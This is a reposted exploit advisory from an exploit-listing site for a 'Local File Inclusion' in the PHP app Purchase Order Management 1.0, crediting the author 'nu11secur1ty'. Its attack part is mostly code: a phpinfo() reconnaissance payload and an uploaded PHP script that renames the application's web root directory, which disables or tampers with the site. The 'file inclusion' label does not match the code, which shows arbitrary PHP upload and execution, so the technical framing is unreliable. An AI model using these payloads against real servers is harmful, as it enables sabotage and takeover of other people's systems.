Advertisement






Purchase Order Management-1.0 Local File Inclusion

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023040029

Below is a copy:

Purchase Order Management-1.0 Local File Inclusion
## Title: Purchase Order Management-1.0 - Local File Inclusion 
## Author: nu11secur1ty
## Date: 03.06.2023
## Vendor: https://www.sourcecodester.com/user/257130/activity
## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
## Reference: https://brightsec.com/blog/file-inclusion-vulnerabilities/

## Description:
The Purchase Order Management-1.0 suffer from File Inclusion Vulnerabilities.
The users of this system are allowed to submit input into files or
upload files to the server.
The malicious attacker can get absolute control of this system!

STATUS: CRITICAL Vulnerability


[+]Get Info:

```PHP
<?php
// by nu11secur1ty - 2023
phpinfo();
?>

```
[+]Exploit:

```PHP
<?php
// by nu11secur1ty - 2023
// Old Name Of The file
$old_name = "C:/xampp7/htdocs/purchase_order/" ;

// New Name For The File
$new_name = "C:/xampp7/htdocs/purchase_order_stupid/" ;

// using rename() function to rename the file
rename( $old_name, $new_name) ;

?>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-1.0)

## Proof and Exploit:
[href](https://streamable.com/vkq31h)

## Time spend:
00:35:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.